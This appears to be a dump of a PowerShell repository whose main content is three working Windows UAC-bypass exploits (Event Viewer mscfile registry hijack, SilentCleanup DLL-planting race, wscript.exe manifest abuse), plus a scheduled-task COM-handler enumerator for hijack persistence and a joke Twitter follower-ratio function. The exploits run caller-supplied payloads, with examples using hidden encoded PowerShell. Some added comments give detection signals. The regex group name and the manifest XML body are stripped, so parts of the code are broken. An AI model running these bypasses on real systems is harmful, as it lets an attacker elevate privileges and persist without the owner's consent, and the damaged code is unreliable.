├── README.md
├── Get-Mattifestation.ps1
├── Get-ScheduledTaskComHandler.ps1
├── Invoke-EventVwrBypass.ps1
├── Invoke-DiskCleanupBypass.ps1
└── Invoke-WScriptBypassUAC.ps1
/README.md:
--------------------------------------------------------------------------------
# Misc-PowerShell-Stuff
random powershell goodness

--------------------------------------------------------------------------------
/Get-Mattifestation.ps1:
--------------------------------------------------------------------------------
function Get-Mattifestation {
<#
.SYNOPSIS
Computes a Twitter handle's "mattifestations": the handle's follower count
divided by @mattifestation's follower count, rounded to three decimals.

TODO: -ATD flag to calculate the mattifestations of all ATD users.

Function: Get-Mattifestation
Author: @enigma0x3, @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.PARAMETER Handle
Twitter handle (without the leading @). Accepts pipeline input.

.OUTPUTS
PSObject with Handle and Mattifestations properties, one per input handle.

.EXAMPLE
Get-Mattifestation -Handle enigma0x3

.EXAMPLE
"enigma0x3","harmj0y","sixdub" | Get-Mattifestation | Sort-Object Mattifestations -Descending | ft -AutoSize

.LINK
https://twitter.com/lee_holmes/status/289810790821789696
#>

    [CmdletBinding()]
    Param(
        [Parameter(Position=0,Mandatory=$True,ValueFromPipeline=$True)]
        [string]$Handle
    )

    begin {
        # The reference count is fetched once per pipeline, not once per handle.
        # Any failure reaching twitter.com is surfaced as a single terminating error.
        try {
            $Client = New-Object Net.WebClient
            $ReferencePage = $Client.DownloadString("http://twitter.com/mattifestation")
            if ($ReferencePage -match '([,\d]+).*Followers') {
                [int]$Mattifestation = $Matches[1]
            }
        }
        catch {
            throw "Error contacting twitter.com"
        }
    }
    process {
        # Scrape the follower count from the profile page with the same pattern
        # used for the reference account.
        $ProfilePage = $Client.DownloadString("http://twitter.com/$Handle")
        if ($ProfilePage -match '([,\d]+).*Followers') {
            [int]$User = $Matches[1]
        }

        # Format to three decimals first, then cast back to a number.
        $Ratio = [double]("{0:N3}" -f ($User / $Mattifestation))

        New-Object PSObject -Property @{
            Handle          = $Handle
            Mattifestations = $Ratio
        }
    }
}

--------------------------------------------------------------------------------
/Get-ScheduledTaskComHandler.ps1:
--------------------------------------------------------------------------------
function Get-ScheduledTaskComHandler {
<#
.SYNOPSIS
Author: Matt Nelson (@enigma0x3), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

Checks all scheduled tasks that execute on user logon & have a "Custom handler" set. This will expose
tasks that are able to be abused for userland persistence via COM handler hijacking.

.DESCRIPTION
Walks every task definition file under %windir%\System32\Tasks, parses it as XML and,
for tasks that declare a ComHandler action, resolves the handler CLSID to the DLL
registered under HKCR:\CLSID\<clsid>\InprocServer32. Each result carries the task name,
CLSID, DLL path, whether the task has a LogonTrigger and whether it runs in a user
context. From a defensive standpoint the CLSID/Dll pairs returned are the registrations
to watch for per-user overrides of; the function itself only reads and never writes.

.EXAMPLE

PS C:\> Get-ScheduledTaskComHandler

Return all scheduled tasks with COM handlers.

.PARAMETER OnLogon
Shows all Tasks that start on logon & associated CLSIDS/DLLs

.PARAMETER PersistenceLocations
Shows all Tasks that are able to be Hijacked for userland persistence.

#>


    [CmdletBinding(DefaultParameterSetName = 'OnLogon')]
    param(
        [Parameter(ParameterSetName = 'OnLogon')]
        [Switch]
        $OnLogon,
        [Parameter(ParameterSetName = 'PersistenceLocations')]
        [Switch]
        $PersistenceLocations

    )

    # Non-terminating errors (unreadable task XML, a CLSID with no InprocServer32 value)
    # are silenced for the whole function; the affected fields simply come back $null.
    $ErrorActionPreference = "SilentlyContinue"
    $Path = "$($ENV:windir)\System32\Tasks"
    # An HKCR: drive is required for the CLSID lookup below; its creation is discarded.
    $null = New-PSDrive -PSProvider registry -root HKEY_CLASSES_ROOT -Name HKCR
    # Every non-directory entry under the Tasks folder is treated as a task XML document.
    Get-ChildItem -Path $Path -Recurse | Where-Object { ! $_.PSIsContainer } | ForEach-Object {
        $TaskName = $_.Name
        $TaskXML = [xml] (Get-Content $_.FullName)
        if($TaskXML.Task.Actions.ComHandler) {
            $TaskTrigger = $TaskXML.Task.Triggers.OuterXML
            # NOTE(review): this loops once per Exec.Command element even though the
            # object built inside describes the ComHandler action; the iteration count
            # looks unintended (tasks with several Exec actions would be reported several
            # times) — confirm against the upstream file.
            $TaskXML.Task.Actions.Exec.Command| ForEach-Object {

                $COM = $TaskXML.Task.Actions.ComHandler.ClassID
                # Resolve the handler CLSID to its in-process server DLL.
                $dll = (Get-ItemProperty -LiteralPath HKCR:\CLSID\$COM\InprocServer32).'(default)'
                $Out = New-Object PSObject
                $Out | Add-Member Noteproperty 'TaskName' $TaskName
                $Out | Add-Member Noteproperty 'CLSID' $COM
                $Out | Add-Member Noteproperty 'Dll' $dll
                $Out | Add-Member Noteproperty 'Logon' $False
                # NOTE(review): $Matches['Context'] below expects a capture group named
                # "Context"; the group name appears to have been lost in extraction of this
                # page, so verify the pattern against the original source before relying on it.
                $null = $TaskXML.Task.InnerXml -match 'Context="(?InteractiveUsers|AllUsers|AnyUser)"'

                $IsUserContext = $False
                if ($Matches['Context']) { $IsUserContext = $True }
                $Out | Add-Member Noteproperty 'IsUserContext' $IsUserContext

                # Logon is decided purely by the presence of a LogonTrigger element in the triggers XML.
                if($TaskTrigger.Contains('LogonTrigger')){
                    $Out.Logon = $True
                }
                else{$Out.Logon = $False}

                # Assigned but never read.
                $Context = $null

                # Neither switch is set unless passed explicitly (the default parameter set
                # name does not set $OnLogon), so a bare call takes the final else branch and
                # emits every ComHandler task regardless of trigger or context.
                if($OnLogon){
                    if ($Out.Logon) {
                        $Out
                    }
                } elseif($PersistenceLocations){
                    # "True" is coerced to [bool] for the comparison against the Logon property.
                    if ($Out.IsUserContext -and $Out.Logon -eq "True") {
                        $Out
                    }
                } else { $Out }
            }
        }
    }
}
--------------------------------------------------------------------------------
/Invoke-EventVwrBypass.ps1:
--------------------------------------------------------------------------------
function Invoke-EventVwrBypass {
<#
.SYNOPSIS

Bypasses UAC by performing an image hijack on the .msc file extension
Expected to work on Win7, 8.1 and Win10

Only tested on Windows 7 and Windows 10

Author: Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Writes a per-user shell\open\command value for the mscfile class, starts eventvwr.exe
from the current (unelevated) context, waits five seconds, then removes the key again
and stops the Event Viewer process. Detection artifacts visible in this code: creation
of HKCU:\Software\Classes\mscfile\shell\open\command by a non-elevated process followed
within seconds by an eventvwr.exe launch, and deletion of that key about five seconds
later. Because the key is short-lived, event-driven registry auditing is needed; a
periodic scan will usually miss it.

.PARAMETER Command

Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc "

.PARAMETER Force

Overwrite an existing mscfile shell\open\command value instead of aborting.

.EXAMPLE

Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc 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"

This will write out "Is Elevated: True" to C:\UACBypassTest.

#>

    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Command,

        [Switch]
        $Force
    )
    # Read the machine UAC policy; the function refuses to run at "Always notify"
    # (ConsentPromptBehaviorAdmin = 2 together with PromptOnSecureDesktop = 1).
    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop

    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
        "UAC is set to 'Always Notify'. This module does not bypass this setting."
        # NOTE(review): exit ends the hosting PowerShell session, not just this function.
        exit
    }
    else{
        #Begin Execution
        $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
        # The stored value is prefixed with $pshome (the PowerShell install directory).
        $Command = $pshome + '\' + $Command
        #Add in the new registry entries to hijack the msc file
        # Refuses to clobber an existing (default) value unless -Force was given.
        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
            New-Item $mscCommandPath -Force |
                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
        }else{
            Write-Warning "Key already exists, consider using -Force"
            exit
        }

        if (Test-Path $mscCommandPath) {
            Write-Verbose "Created registry entries to hijack the msc extension"
        }else{
            Write-Warning "Failed to create registry key, exiting"
            exit
        }

        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
        #Start Event Viewer
        # Honors -WhatIf/-Confirm: with -WhatIf nothing is started and $Process stays unset.
        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
            $Process = Start-Process -FilePath $EventvwrPath -PassThru
            Write-Verbose "Started eventvwr.exe"
        }

        #Sleep 5 seconds
        Write-Verbose "Sleeping 5 seconds to trigger payload"
        if (-not $PSBoundParameters['WhatIf']) {
            Start-Sleep -Seconds 5
        }

        $mscfilePath = "HKCU:\Software\Classes\mscfile"

        # Cleanup: the whole mscfile class key is removed, not only the command subkey.
        if (Test-Path $mscfilePath) {
            #Remove the registry entry
            Remove-Item $mscfilePath -Recurse -Force
            Write-Verbose "Removed registry entries"
        }

        # NOTE(review): under -WhatIf $Process was never assigned, so $Process.Id is $null
        # here — confirm Get-Process tolerates that with -ErrorAction SilentlyContinue.
        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
            Stop-Process -Id $Process.Id
            Write-Verbose "Killed running eventvwr process"
        }
    }
}
--------------------------------------------------------------------------------
/Invoke-DiskCleanupBypass.ps1:
--------------------------------------------------------------------------------
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Registers a WMI __InstanceCreationEvent subscription for GUID-named folders created
under %TEMP%, then starts the \Microsoft\Windows\DiskCleanup\SilentCleanup task with
schtasks. When the subscription fires, the handler copies DllPath into the new folder
as LogProvider.dll and raises a custom 'DllPlantedSuccess' event; the function waits up
to 10 seconds for that event and returns the FileInfo of the copied file. The same
WQL filter (GUID-named directory creation under %TEMP% within a second of a
SilentCleanup run, followed by a LogProvider.dll written by a non-DISM process) is the
natural detection signal for this behaviour.

.PARAMETER DllPath

Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll.

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose

The DllPath can have any extension as long as the file itself is a DLL.
#>

    [CmdletBinding()]
    [OutputType([System.IO.FileInfo])]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        [ValidateScript({ Test-Path $_ })]
        $DllPath
    )

    # Event handler executed by Register-WmiEvent when a matching folder appears.
    # It runs outside the caller's scope: inputs arrive via $Event.MessageData and the
    # triggering folder via $EventArgs.NewEvent.TargetInstance.
    $PrivescAction = {
        $ReplacementDllPath = $Event.MessageData.DllPath
        # The newly created GUID folder
        $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name

        $OriginalPreference = $VerbosePreference

        # Force -Verbose to display in the event
        if ($Event.MessageData.VerboseSet -eq $True) {
            $VerbosePreference = 'Continue'
        }

        Write-Verbose "DismHost folder created in $DismHostFolder"
        Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll"

        # A failed copy is reported as a warning only; $FileInfo then stays unset and
        # no success event is raised, which the caller sees as a Wait-Event timeout.
        try {
            $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop
        } catch {
            Write-Warning "Error copying file! Message: $_"
        }

        # Restore the event preference
        $VerbosePreference = $OriginalPreference

        if ($FileInfo) {
            # Trigger Wait-Event to return and indicate success.
            New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo
        }
    }

    $VerboseSet = $False
    if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }

    $MessageData = New-Object -TypeName PSObject -Property @{
        DllPath = $DllPath
        VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since
                                 # event scriptblocks will not automatically honor -Verbose.
    }

    # WQL needs the drive letter ("C:") and the path separately; backslashes in the
    # path must be doubled for the query string.
    $TempDrive = $Env:TEMP.Substring(0,2)

    # Trigger the DLL dropper with the following conditions:
    # 1) A directory is created - i.e. new Win32_Directory instance
    # 2) The directory created is created under %TEMP%
    # 3) The directory name is in the form of a GUID
    $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""

    # The watcher is registered before the task is started so the creation event is not missed.
    $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData

    # We need to jump through these hoops to properly capture stdout and stderr of schtasks.
    $StartInfo = New-Object Diagnostics.ProcessStartInfo
    $StartInfo.FileName = 'schtasks'
    $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I'
    $StartInfo.RedirectStandardError = $True
    $StartInfo.RedirectStandardOutput = $True
    $StartInfo.UseShellExecute = $False
    $Process = New-Object Diagnostics.Process
    $Process.StartInfo = $StartInfo
    $null = $Process.Start()
    $Process.WaitForExit()
    $Stdout = $Process.StandardOutput.ReadToEnd().Trim()
    $Stderr = $Process.StandardError.ReadToEnd().Trim()

    # Any stderr output from schtasks is treated as a hard failure; the subscription
    # is torn down before throwing so no handler is left registered.
    if ($Stderr) {
        Unregister-Event -SubscriptionId $TempFolderWatcher.Id
        throw "SilentCleanup task failed to execute. Error message: $Stderr"
    } else {
        # NOTE(review): this branch unregisters the watcher but does not return, so
        # execution continues to the "executed successfully" message, Wait-Event, and a
        # second Unregister-Event on the same subscription id.
        if ($Stdout.Contains('is currently running')) {
            Unregister-Event -SubscriptionId $TempFolderWatcher.Id
            Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'
        }

        Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"
    }

    # Block up to 10 s for the handler's success signal; $null on timeout.
    $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10

    Unregister-Event -SubscriptionId $TempFolderWatcher.Id

    if ($PayloadExecutedEvent) {
        Write-Verbose 'UAC bypass was successful!'

        # Output the file info for the DLL that was planted
        $PayloadExecutedEvent.MessageData

        $PayloadExecutedEvent | Remove-Event
    } else {
        # The event timed out.
        Write-Error 'UAC bypass failed. The DLL was not planted in its target.'
    }
}
--------------------------------------------------------------------------------
/Invoke-WScriptBypassUAC.ps1:
--------------------------------------------------------------------------------
function Invoke-WScriptBypassUAC
{
<#
.SYNOPSIS

Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.

Author: @enigma0x3, @harmj0y, Vozzie
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute VBScript using the wscript executable
with the new manifest. The VBScript executed by C:\Windows\wscript.exe will run elevated.

Host artifacts produced by this code, useful for detection and cleanup: a copy of
wscript.exe and a wscript.exe.manifest in %WINDIR% (removed by a delayed cmd /c
timeout&&del chain after about five seconds), a dot-less .tmp cabinet in %TEMP%,
makecab.exe and wusa.exe /extract invocations targeting %WINDIR% from an unelevated
process, and a VBScript stored in an alternate data stream on %USERPROFILE%\AppData.

.PARAMETER payload
The code you want wscript.exe to run elevated. Put the full command in quotes.

.EXAMPLE
Invoke-WScriptBypass -payload "powershell.exe -ep Bypass -WindowStyle Hidden -enc "

.LINK
http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
https://github.com/Vozzie/uacscript
#>

    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$True)]
        [string]
        $payload
    )

    # Returns a random path under %TEMP% with every '.' removed (GetRandomFileName
    # yields name.ext, ".tmp" is appended, then the dots are split out and re-joined).
    function Local:Get-TempFileName {
        #Generate Temporary File Name
        $sTempFolder = $env:Temp
        $sTempFolder = $sTempFolder + "\"
        $sTempFileName = [System.IO.Path]::GetRandomFileName() + ".tmp"
        $sTempFileName = $sTempFileName -split '\.',([regex]::matches($sTempFileName,"\.").count) -join ''
        $sTempFileNameFinal = $sTempFolder + $sTempFileName
        return $sTempFileNameFinal
    }

    # Copies $sSource into $sTarget by packing it with makecab and unpacking with
    # wusa /extract. The wusa extraction into %WINDIR% from a non-admin context is the
    # primitive this whole function relies on and the highest-value thing to alert on.
    function Local:Invoke-CopyFile($sSource, $sTarget) {
        # Cab wscript, send to temp and then extract it from temp to $env:WINDIR
        $sTempFile = Get-TempFileName
        # makecab is started asynchronously (no -Wait) and wusa runs right after;
        # the Start-Sleep below is the only synchronisation between the two.
        Start-Process -WindowStyle Hidden -FilePath "$($env:WINDIR)\System32\makecab.exe" -ArgumentList "$sSource $sTempFile"
        $null = wusa "$sTempFile" /extract:"$sTarget" /quiet

        # sleep for 2 seconds to allow for extraction to finish
        Start-Sleep -s 2

        # remove the temp files
        Remove-Item $sTempFile
    }

    # Builds a one-line VBScript that runs $payload hidden and then a second hidden
    # cmd chain that deletes the planted wscript.exe and manifest, writes it to an ADS
    # on %USERPROFILE%\AppData, runs it with the planted %WINDIR%\wscript.exe, and
    # deletes the stream afterwards.
    function Local:Invoke-WscriptTrigger {

        # Random .vbs name with the dot removed, used as the ADS name.
        $VBSfileName = [System.IO.Path]::GetRandomFileName() + ".vbs"
        $ADSFile = $VBSFileName -split '\.',([regex]::matches($VBSFileName,"\.").count) -join ''

        $VBSPayload = "Dim objShell:"
        $VBSPayload += "Dim oFso:"
        $VBSPayload += "Set oFso = CreateObject(""Scripting.FileSystemObject""):"
        $VBSPayload += "Set objShell = WScript.CreateObject(""WScript.Shell""):"
        # $payload is interpolated verbatim; a value containing double quotes breaks the script.
        $VBSPayload += "command = ""$payload"":"
        $VBSPayload += "objShell.Run command, 0:"

        # stupid command to kick off a background cmd process to delete the wscript and manifest
        $DelCommand = "$($env:WINDIR)\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del $($env:WINDIR)\wscript.exe&&del $($env:WINDIR)\wscript.exe.manifest"""""""""
        $VBSPayload += "command = ""$DelCommand"":"
        $VBSPayload += "objShell.Run command, 0:"
        $VBSPayload += "Set objShell = Nothing"

        "[*] Storing VBS payload into `"$env:USERPROFILE\AppData:$ADSFile`""
        # The script is written via cmd echo redirection into an alternate data stream.
        $CreateWrapperADS = {cmd /C "echo $VBSPayload > ""$env:USERPROFILE\AppData:$ADSFile"""}
        Invoke-Command -ScriptBlock $CreateWrapperADS

        "[*] Executing VBS payload with modified scripting host"
        $ExecuteScript = {cmd /C "$($env:WINDIR)\wscript.exe ""$env:USERPROFILE\AppData:$ADSFile"""}
        Invoke-Command -ScriptBlock $ExecuteScript

        "[*] Removing Alternate Data Stream from $("$env:USERPROFILE\AppData:$ADSFile")"
        Remove-ADS $env:USERPROFILE\AppData:$ADSFile
    }

    # Writes the manifest to %TEMP%, copies manifest and wscript.exe into %WINDIR%
    # via Invoke-CopyFile, then hands off to Invoke-WscriptTrigger.
    function Local:Invoke-WscriptElevate {

        # NOTE(review): the manifest XML body in this here-string was stripped during
        # extraction of this page (only two bare "true" element values survive and two
        # source lines are missing entirely); the original content is not recoverable here.
        $WscriptManifest =
@"











true
true



"@

        # Copy and apply manifest to wscript.exe
        $sManifest = $env:Temp + "\wscript.exe.manifest"
        $WscriptManifest | Out-File $sManifest -Encoding UTF8

        "[*] Cabbing and extracting manifest into $($env:WINDIR)"
        Invoke-CopyFile $sManifest $env:WINDIR

        "[*] Cabbing and extracting wscript.exe into $($env:WINDIR)"
        $WScriptPath = "$($env:WINDIR)\System32\wscript.exe"
        Invoke-CopyFile $WScriptPath $env:WINDIR
        Remove-Item -Force $sManifest

        # execute the payload
        Invoke-WscriptTrigger
    }

    function Local:Remove-ADS {
    <#
    .SYNOPSIS
    Removes an alterate data stream from a specified location.
    P/Invoke code adapted from PowerSploit's Mayhem.psm1 module.
    Author: @harmj0y, @mattifestation
    License: BSD 3-Clause
    .PARAMETER ADSPath
    Path in the form file:streamname to delete.
    .LINK
    https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
    #>
        [CmdletBinding()] Param(
            [Parameter(Mandatory=$True)]
            [string]$ADSPath
        )

        #region define P/Invoke types dynamically
        # stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
        # A throw-away in-memory assembly is emitted so kernel32!DeleteFile can be called
        # directly (presumably because Remove-Item does not accept file:stream paths).
        $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)

        $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class')
        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
            @('kernel32.dll'),
            [Reflection.FieldInfo[]]@($SetLastError),
            @($True))

        # Define [Win32.Kernel32]::DeleteFile
        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteFile',
            'kernel32.dll',
            ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
            [Reflection.CallingConventions]::Standard,
            [Bool],
            [Type[]]@([String]),
            [Runtime.InteropServices.CallingConvention]::Winapi,
            [Runtime.InteropServices.CharSet]::Ansi)
        $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)

        $Kernel32 = $TypeBuilder.CreateType()

        # DeleteFile returns a BOOL; failure is only reported at -Verbose level.
        $Result = $Kernel32::DeleteFile($ADSPath)

        if ($Result){
            Write-Verbose "Alternate Data Stream at $ADSPath successfully removed."
        }
        else{
            Write-Verbose "Alternate Data Stream at $ADSPath removal failure!"
        }
    }

    #make sure we are running on vulnerable windows version (vista,7)
    # Only 6.0 <= version < 6.2 proceeds; callers that are already in the local
    # Administrators role are skipped with a warning.
    $OSVersion = [Environment]::OSVersion.Version
    if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))){
        if(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $True){
            Write-Warning "[!] You are already elevated!"
        }
        else {
            Invoke-WscriptElevate
        }
    }else{Write-Warning "[!] Target Not Vulnerable"}
}
--------------------------------------------------------------------------------